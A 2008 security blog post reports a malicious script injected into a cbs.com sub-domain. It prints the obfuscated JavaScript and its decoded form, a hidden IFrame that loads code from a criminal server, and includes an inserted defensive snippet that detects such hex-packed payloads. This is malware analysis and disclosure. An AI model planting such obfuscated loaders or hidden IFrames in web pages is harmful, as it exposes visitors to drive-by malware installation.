Malicious Code Research (MCRC) Blog - 2009

Nov 27, 2008

CBS.COM was compromised

Today Finjan’s MCRC has revealed that the famous radio and television network, CBS, was compromised as a result of malicious activity.

According to Alexa.com, the cbs.com website has a traffic rank of 964.

The cybercriminals added a malicious obfuscated script to the infected page. When it runs, the injected script writes a malicious IFrame into the page.


Obfuscated script injected on cbs.com sub-domain

The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, which can lead to malware being installed on the unsuspecting client machine. The remote Russian server is already down.

The obfuscated code as it appears in the page source on the cbs.com sub-domain:

<script>function v4818cf77547e5(v4818cf7754fde){ function v4818cf77557d4 () {return 16;}
return(parseInt(v4818cf7754fde,v4818cf77557d4()));}function v4818cf77563de(v4818cf77567c7)
{ function v4818cf77577b8 () {var v4818cf7757faf=2; return v4818cf7757faf;}
var v4818cf7756bc2='';for([REMOVED]<v4818cf77567c7.length; v4818cf7756fbe+=v4818cf77577b8())
{ v4818cf7756bc2+=(String.fromCharCode(v4818cf77547e5(v4818cf77567c7.substr(v4818cf7756fbe,
v4818cf77577b8()))));}return v4818cf7756bc2;} document.all('yby').value=(v4818cf77563de
('3C5343524950543E77696E[REMOVED]3D363332206865696768743D343037207374796
[REMOVED]543E'));</script>

The de-obfuscated script:

<SCRIPT> window.status='Done'; document.write('<iframe name=29dee5c6 src=\'http://[REMOVED]/.if/go.html?' +Math.round(Math.random()*257224)+'3e78\' width=632 height=407 style=\'display: none\'></iframe>') </SCRIPT>
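The decoder above reads a hex string two characters at a time with parseInt(..., 16) and String.fromCharCode. As an added example (not MCRC's code or tooling), the sketch below performs the same decoding statically, without executing the page script, and flags decoded text that contains a hidden IFrame. The function names, the 40-character minimum, the detection heuristics and the example.invalid sample are assumptions of this example.

```javascript
// Added example: statically unpack hex-packed string literals found in a
// script and flag hidden-iframe markup. The page script is never executed.

// Decode a hex string two characters at a time, as the injected decoder does.
function hexDecode(hex) {
  let out = '';
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Collect quoted literals that are pure hex, of even length, and long enough
// to be a packed payload rather than a colour code or short identifier.
function findHexLiterals(source, minLen = 40) {
  const re = /(['"])((?:[0-9A-Fa-f]{2})+)\1/g;
  const hits = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    if (m[2].length >= minLen) hits.push(m[2]);
  }
  return hits;
}

// Heuristic (assumption of this example): an iframe that is hidden by style.
function looksLikeHiddenIframe(text) {
  return /<iframe\b/i.test(text) &&
    /display\s*:\s*none|visibility\s*:\s*hidden/i.test(text);
}

// Decode every candidate literal and report what it unpacks to.
function scanScript(source) {
  return findHexLiterals(source).map((hex) => {
    const decoded = hexDecode(hex);
    return { decoded, suspicious: looksLikeHiddenIframe(decoded) };
  });
}

// Constructed sample input: inert markup packed the same way, placeholder host.
function toHex(s) {
  return Array.from(s, (c) => c.charCodeAt(0).toString(16).padStart(2, '0')).join('').toUpperCase();
}
const payload = "<SCRIPT>document.write('<iframe src=\\'http://example.invalid/\\' style=\\'display: none\\'></iframe>')</SCRIPT>";
const sample = "<script>document.all('yby').value=(d('" + toHex(payload) + "'));</script>";
const benign = "<script>var color='DEADBEEF';</script>";

console.log(scanScript(sample), scanScript(benign));
```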

The malicious Russian server, from which the IFrame pulled the malicious code:

As always, the MCRC team immediately informed CBS.com of the infection.

This case shows us once again that infecting legitimate websites with malicious obfuscated code remains a favorite and highly effective attack vector for hackers!

We have not seen the last of it yet...

Posted by Moshe Basanchig

      
